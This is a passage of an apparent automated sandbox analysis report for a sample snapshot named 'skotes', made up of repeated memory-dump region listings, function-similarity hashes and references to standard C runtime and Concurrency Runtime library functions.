                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 893951542-0
                                                                                                                                                                                                                                                  • Opcode ID: 286aa2dd99d415585428276457146c2e02fa1c3e53dfea394c73a086a940c144
                                                                                                                                                                                                                                                  • Instruction ID: 429782b41b9e22d3c1f437e4ea17532477d96aff68f1c057c547aed83ebc9091
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 286aa2dd99d415585428276457146c2e02fa1c3e53dfea394c73a086a940c144
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16312636B015108FCF05AF60D885EAD7BA6AFC8710F2841BEE9099B395DF34AD058B94
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00492D0F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: BuffersConcurrency::details::InitializeManager::Resource
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3433162309-0
                                                                                                                                                                                                                                                  • Opcode ID: 52535be4ce39931388c3a83df26eeccda4447c7452a579cc807d31911f904747
                                                                                                                                                                                                                                                  • Instruction ID: d19bd16b35b48c20dd5958c561c3d638c43296ad1ee6cd28844bba6b37c5a17e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52535be4ce39931388c3a83df26eeccda4447c7452a579cc807d31911f904747
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6315775A00309EFCF10DF94CAC0AAE7FB9BB44314F1405BAD901AB346D7B4A945DBA5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 004A13FC
                                                                                                                                                                                                                                                  • Concurrency::details::_TaskCollectionBase::_GetTokenState.LIBCONCRT ref: 004A1447
                                                                                                                                                                                                                                                  • Concurrency::details::_CancellationTokenState::_RegisterCallback.LIBCONCRT ref: 004A147A
                                                                                                                                                                                                                                                  • Concurrency::details::_StructuredTaskCollection::_CountUp.LIBCMT ref: 004A152A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::_$TaskToken$Base::_CallbackCancellationCollectionCollection::_CountH_prolog3_catchRegisterStateState::_Structured
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2092016602-0
                                                                                                                                                                                                                                                  • Opcode ID: c2bf0e65f0a99ceacee01da94d42cbf803a5d47e35d9985f5e3f55b20e22f6eb
                                                                                                                                                                                                                                                  • Instruction ID: 99832ec09e265e12a37df875021d32efc3aa5f64c7ddc8087ed9f46523728d13
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2bf0e65f0a99ceacee01da94d42cbf803a5d47e35d9985f5e3f55b20e22f6eb
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E31A371E006059FCF14EFA9C4919EDFBB1BF59714B14822EE416A7391CB38AD41CB98
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 531285432-0
                                                                                                                                                                                                                                                  • Opcode ID: b3fd092497d18a190bd7991764a65600974c89a9ea05f8cd30dd08ed13a7a659
                                                                                                                                                                                                                                                  • Instruction ID: 601e35367c1452bf4fb48eb5ea6fac57bb75b905bf46983718ed5679f12a39c4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3fd092497d18a190bd7991764a65600974c89a9ea05f8cd30dd08ed13a7a659
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB211D75A00119AFDF01FFA5D8819BEB7B9EF08714F10046AFA01B7291DB389D019BA5
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_catch.LIBCMT ref: 00499C9C
                                                                                                                                                                                                                                                  • Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00499CE8
                                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 00499CFE
                                                                                                                                                                                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 00499D6A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
